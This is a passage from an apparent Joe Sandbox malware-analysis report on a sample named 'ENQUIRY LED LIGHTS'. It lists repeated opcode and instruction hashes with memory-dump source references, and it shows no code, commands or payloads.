                                                                                                  • Opcode Fuzzy Hash: 34c7707cb1464e162e86b13887f07ea6733edb2411bb08cef1fc4fa278e818d2
                                                                                                  • Instruction Fuzzy Hash: BF417F716043059BE760DF29C844F9BBBE9FF88794F004A2EF698D7250DB709904CB92
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c0546e1d91344ee42197abb911c4621b9a4020493afc62da9690b35f9e44ebf0
                                                                                                  • Instruction ID: 510c17fedbeecb4d656e3d77fed7822d79b8c88e81b29f6d424b512cf77e5685
                                                                                                  • Opcode Fuzzy Hash: c0546e1d91344ee42197abb911c4621b9a4020493afc62da9690b35f9e44ebf0
                                                                                                  • Instruction Fuzzy Hash: C341C472A046519FD724DF68C840A6AB3E9FFC8780F04062DFA55D7690EB30E904CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d53d7f7004a4e6545679d89ae0e2dfa2c68d289cfbb41e32b3cf5bd607459e45
                                                                                                  • Instruction ID: 4b57e38ecb61c208376d7f41589d7650ee0f07f4f46a52887ccaaba7b5a86bb0
                                                                                                  • Opcode Fuzzy Hash: d53d7f7004a4e6545679d89ae0e2dfa2c68d289cfbb41e32b3cf5bd607459e45
                                                                                                  • Instruction Fuzzy Hash: 6B411370A003018BD724DF28D8A4B2AB7EAFFC13E4F94442DEB558B2A5DB31D851CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7c4982c7d60366b76b0d1cfdcbf3bd12c659f8e19a2f0c1002b7bd7f67cf4324
                                                                                                  • Instruction ID: ddb7b3589977fb5fe2d30a350d39bf1c518851d4ffdeb8adb52b448bc654a451
                                                                                                  • Opcode Fuzzy Hash: 7c4982c7d60366b76b0d1cfdcbf3bd12c659f8e19a2f0c1002b7bd7f67cf4324
                                                                                                  • Instruction Fuzzy Hash: 25416D36B00646EFDB169F29CC84B5ABBAAFF44784F444056EA0587661DB74E820CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                  • Instruction ID: 7b1677c4663f8c08de305209d570c9c9ca69f4b5b80b6e771f440df28fe47978
                                                                                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                  • Instruction Fuzzy Hash: D6312833A08254AFDB118B68CC44BAABBFAEF15390F0441AAE955D7351C774D888CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 511249136fda0415e79e8136695e29f3f39743216f91a2fa954a3957ce451668
                                                                                                  • Instruction ID: a94d74c93a60b735803fb2088f8f87b2e9d8e9ca887ea0fdae492937ade4196f
                                                                                                  • Opcode Fuzzy Hash: 511249136fda0415e79e8136695e29f3f39743216f91a2fa954a3957ce451668
                                                                                                  • Instruction Fuzzy Hash: CB319675740755EBD7279F658D81FEB76A5AF4DB94F400068B700AB2D1DAA4DC00CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23a0def8847923d0f5486f0936843a51fae2d2e522e2993ad2db2124c3b2cd9f
                                                                                                  • Instruction ID: 76287196135936c76f516395df155457638696128a0b25a9ec63843eb7570a40
                                                                                                  • Opcode Fuzzy Hash: 23a0def8847923d0f5486f0936843a51fae2d2e522e2993ad2db2124c3b2cd9f
                                                                                                  • Instruction Fuzzy Hash: 8031F432A05212CFC324DF19D9A0E26B7E6FF813A4F16446EEA559B261DB31EC14CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 18201a6106858e77878c7a6751e6af93a23b4def24a5c930161c6c4f377d106e
                                                                                                  • Instruction ID: 387625e0e150147945c2d02380227c626ae0db71f2212ffe07a4c3085bdd3eb1
                                                                                                  • Opcode Fuzzy Hash: 18201a6106858e77878c7a6751e6af93a23b4def24a5c930161c6c4f377d106e
                                                                                                  • Instruction Fuzzy Hash: 15319C75A1020ADFCB14DF18C8809AEB7B6FF84344F114569F9099B392E731EA51CF94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ea0c2a04257e19d102e512d57087479a1f13744bbafdca68a4226ca138fdaa34
                                                                                                  • Instruction ID: d735ecdef69725bdb44fca0f673fd6aea878dc1303762be8279a3ac6c235e65b
                                                                                                  • Opcode Fuzzy Hash: ea0c2a04257e19d102e512d57087479a1f13744bbafdca68a4226ca138fdaa34
                                                                                                  • Instruction Fuzzy Hash: CA21B171A00629DBDF14DF59C881ABEB7F5FF48794F500069EA41AB240D739AD41CFA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4e0d8d16e1444ef7e221de03340c77de44973f3b0dd045ad20d38db1a84b260
                                                                                                  • Instruction ID: d345e0144ccd9ae1259ac9b031ea146fae4924d2bcb63cfa5bd33002d7ffb235
                                                                                                  • Opcode Fuzzy Hash: b4e0d8d16e1444ef7e221de03340c77de44973f3b0dd045ad20d38db1a84b260
                                                                                                  • Instruction Fuzzy Hash: 17219C71A00654AFDB15DF68DC44F6AB7A8FF49784F1400A9FA04DB691DB38ED40CB64
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 54211019f006e45c5cd2b9a64b21c261ecd64bd3fc91b80796572eae0dc457da
                                                                                                  • Instruction ID: e242724e75ba6d96a52a2543d60dfaa00fc16d6a06b47812f4422f2d666f168f
                                                                                                  • Opcode Fuzzy Hash: 54211019f006e45c5cd2b9a64b21c261ecd64bd3fc91b80796572eae0dc457da
                                                                                                  • Instruction Fuzzy Hash: D421B3729083459BEB11EF59C844F6BB7DCEF91394F08045ABE84C7261DB34D948CBA2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c603162407c9663b2116e0cab1448c9b2b0937a94d800fff10da92aa7ca61b3
                                                                                                  • Instruction ID: b8c9d2fd1b9122cac7b6c33925dc845d1380279a9144381a9f90ed1b73a5f06e
                                                                                                  • Opcode Fuzzy Hash: 4c603162407c9663b2116e0cab1448c9b2b0937a94d800fff10da92aa7ca61b3
                                                                                                  • Instruction Fuzzy Hash: C521F632B456849BE723576C8C04F283795EF417F4F2903A6EF229B6E2DB68CC41C640
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ae545dbbac55851a58fe9332e5ee012a3c272b317f0faad4dc5b604aaba855f
                                                                                                  • Instruction ID: fe501b6ca09aa59b8e394bcf184f9f969813a878fd80b03003a6539c3ac67a5f
                                                                                                  • Opcode Fuzzy Hash: 4ae545dbbac55851a58fe9332e5ee012a3c272b317f0faad4dc5b604aaba855f
                                                                                                  • Instruction Fuzzy Hash: D721CF36641A109FC725DF29CC40B56B7F6EF08788F148468A649CF761E731E842CF94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f82d48c5efc7ecfce7842306369d40fb7f580d062af422ee8782349ada1d0132
                                                                                                  • Instruction ID: 3f8d2aba205b47482adeb4c5c956180933377a6b2992d0a6322367152210989b
                                                                                                  • Opcode Fuzzy Hash: f82d48c5efc7ecfce7842306369d40fb7f580d062af422ee8782349ada1d0132
                                                                                                  • Instruction Fuzzy Hash: F1113A72390E1ABFE72259549D00F27769ADBC4BE0F70486CBB08DB2D0EA70EC018795
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3ddec7756f597226f83929de960d1e40f8d115f2df7e42f1562341287adfd302
                                                                                                  • Instruction ID: 7793ade9535cdedbb10fff0bc2be781a6f8b692b454dbf740db9c25bbb7a3b73
                                                                                                  • Opcode Fuzzy Hash: 3ddec7756f597226f83929de960d1e40f8d115f2df7e42f1562341287adfd302
                                                                                                  • Instruction Fuzzy Hash: 522119B1E01208AFDB10DFAAD8809AEFBF9FF98740F10012EE609A7240DB749941CF54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                  • Instruction ID: c468b36500ddb41633a7c0f076dbabdcd2fb09162c990d176848a492758fab6a
                                                                                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                  • Instruction Fuzzy Hash: D4214DB2A00209AFEB129F94CC50BAEBBBAEF48390F204455FA55A7250D774DD51DB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                  • Instruction ID: d619ed944123363770a6f61beb59c81e19b14aab9acc2b1f908e6994ecae8057
                                                                                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                  • Instruction Fuzzy Hash: 6B11B273A01604BFE7269F54CC81F9ABBB9EB80794F204429E7059B190DAB1ED44CB50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 50a7420adbc37b6a24c0b3b3ad2c88dd9ad73975242fd81f4609c007c48df2e2
                                                                                                  • Instruction ID: f9abb654f413c9b3c874109895f8cf4a4317ee72d76ad2d749bf177ddd14ed98
                                                                                                  • Opcode Fuzzy Hash: 50a7420adbc37b6a24c0b3b3ad2c88dd9ad73975242fd81f4609c007c48df2e2
                                                                                                  • Instruction Fuzzy Hash: 7711C831B016189BDB11CF49C6C0A16B7E6EF467D4B984069EE089F205D7B2D901C790
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                  • Instruction ID: 13959829a58dbe1998520c9db73f4039d9ff6640b5d63ba9b56472be8d63ae95
                                                                                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                  • Instruction Fuzzy Hash: AE214C72A81640DFD7259F49C950A66FBE6EB84B98F15807DE64597720CBB0EC41CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8b31a8489130412d2691042338198f6dde7c58f3660c04823bfa249d7023b607
                                                                                                  • Instruction ID: dd50f3e1a108f90113414d5bb879274872da9e3e4edec04da2eef944223c6038
                                                                                                  • Opcode Fuzzy Hash: 8b31a8489130412d2691042338198f6dde7c58f3660c04823bfa249d7023b607
                                                                                                  • Instruction Fuzzy Hash: D9215E76A00205DFEB14CF58C691B6EBBF5FB89398F64416DD605A7310CB71AD06CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1bdb86367988a8e08f944c24ec9a3f77e119a4bf96b03a8d5a2c1237f4ee1239
                                                                                                  • Instruction ID: e4b59593d48c18a53cbe1ff032fcf997cef2c22e4594c03729c1d323161e542f
                                                                                                  • Opcode Fuzzy Hash: 1bdb86367988a8e08f944c24ec9a3f77e119a4bf96b03a8d5a2c1237f4ee1239
                                                                                                  • Instruction Fuzzy Hash: 20218C71600A04EFC7209F68C880F66B7E9FF85390F40882DE6AAC7250DFB0A850CB60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0d6c3e28d5ba063e5f2987e512bbc87da5d47e2136c437d6f6646b4f61d156ad
                                                                                                  • Instruction ID: d7186c576c504d4004c13db8c2c7297852209b0a0e8ea0cac5cd0beb62a756c8
                                                                                                  • Opcode Fuzzy Hash: 0d6c3e28d5ba063e5f2987e512bbc87da5d47e2136c437d6f6646b4f61d156ad
                                                                                                  • Instruction Fuzzy Hash: A8110473B051189BCB1ADB24CC91B6B72ABDFC53F4B254529EA269B290DA31DC12C790
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d49b7ffcce42bba021412838c60ed304d2f40f2d97409406ab02b13cc44a1a1e
                                                                                                  • Instruction ID: 3e3b440619d53cc4fc374550aff4a80cfd9ef52ecbb6c89e5c110d5b3cedf947
                                                                                                  • Opcode Fuzzy Hash: d49b7ffcce42bba021412838c60ed304d2f40f2d97409406ab02b13cc44a1a1e
                                                                                                  • Instruction Fuzzy Hash: A611BF72240614EBDB22DB59CD60F5A77ACBF49BA4F054025F311DB250EA70E804CBA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fc3d24ee08f7cd96e17376a2dff87c1a217ab520cb1735a9a37363b6e6f40879
                                                                                                  • Instruction ID: 192afb08cddacf3d3df83bbf3b917f990f6cbbdcc70b589ef829e79b7a5f1fa8
                                                                                                  • Opcode Fuzzy Hash: fc3d24ee08f7cd96e17376a2dff87c1a217ab520cb1735a9a37363b6e6f40879
                                                                                                  • Instruction Fuzzy Hash: DB11BF76A012189BCB24DF59C980E5ABFE9EF86794F01807ADA09DB310DFB4DD00CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                  • Instruction ID: 2edfdd7210d043b075222c53a7b4e5df33a4002a39bacd34c67bdf55528753cc
                                                                                                  • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                  • Instruction Fuzzy Hash: 5621E0B5A00B059FD3A0CF29C480B52BBF4FB48B60F50492EE98AC7B40E771E854CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                  • Instruction ID: ab98a4017ed543758c159a83c53711f71b36b9d1b13c8165463f69d8230f14e7
                                                                                                  • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                  • Instruction Fuzzy Hash: 60110132A00919AFCB19CB54CC11B9EB7B6EF84350F098269E946A7340E675AE01CB84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                  • Instruction ID: 866b9c4ab914b82c3458a1e470f4d5e751bd399b666afe43005dc2f0deef30f8
                                                                                                  • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                  • Instruction Fuzzy Hash: 80115E32A00604EFEF21DF85CC40F56B7AAEF457D8F05846AEA499B160DB72DD40DB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d3305fbf29df8b67ba9d78ae9450bbda94b7a545bf885ff5ebce7c323280e982
                                                                                                  • Instruction ID: c9726deca4c48748d3bab4b26f24f2e37712e5246b832fd24ee8c74f965bec8d
                                                                                                  • Opcode Fuzzy Hash: d3305fbf29df8b67ba9d78ae9450bbda94b7a545bf885ff5ebce7c323280e982
                                                                                                  • Instruction Fuzzy Hash: 9101C472B06644AFE316A2699C84F2B769DEF417D4F4A00B6FB019B291DB54DC00C6A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 897763eddc14bb86a3cddc9309e6fafe5f7b927a31628e6ec3c9607a41c685bf
                                                                                                  • Instruction ID: d2dd0bd340381787822d0b9e0aae049863da6a371e81b45ab8998724aa9bb299
                                                                                                  • Opcode Fuzzy Hash: 897763eddc14bb86a3cddc9309e6fafe5f7b927a31628e6ec3c9607a41c685bf
                                                                                                  • Instruction Fuzzy Hash: A111AC36640748AFDB25DF59D880F5677B9EFC6BA8F804119FA059B250C771E840CF60
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 29a6e00d7ad5c08eca39d1e69fa86213619e27256aea1e3d4e1ba913cdb902c1
                                                                                                  • Instruction ID: 83d0f1c66847453d9b37898929cd3a32e96676672493beaed0d8c69e30199393
                                                                                                  • Opcode Fuzzy Hash: 29a6e00d7ad5c08eca39d1e69fa86213619e27256aea1e3d4e1ba913cdb902c1
                                                                                                  • Instruction Fuzzy Hash: 1811C272E00615ABDB21DF58DD80B5EFBBDEF89794F900054DA01AB200CB74AD058F50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 91a5acaa133d3c225dd17de542900905686e8b0815c336bbe353c29ac0b6982d
                                                                                                  • Instruction ID: a6c0ba9283e50b8dded017e4e624925f94eea79b3d1a4e189b7825432df4be2b
                                                                                                  • Opcode Fuzzy Hash: 91a5acaa133d3c225dd17de542900905686e8b0815c336bbe353c29ac0b6982d
                                                                                                  • Instruction Fuzzy Hash: 0401B5715051099FDB16DF15DC48F56BBFAEF86358F20816AE2058B2A0C7B4EC45CF90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                  • Instruction ID: 10e65e75f53fad4d6bddda411f5dd238187663923ed28b1f29ed80a15d8f9701
                                                                                                  • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                                  • Instruction Fuzzy Hash: FD118E73B016C59BE7239B28D954B2577E4EF417D8F1901E2EB42CBB92E728C842C651
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                                  • Instruction ID: c5cc044ee0fe2089770007f8684c1da62f5f5271fe1e985412eaf24835f228c7
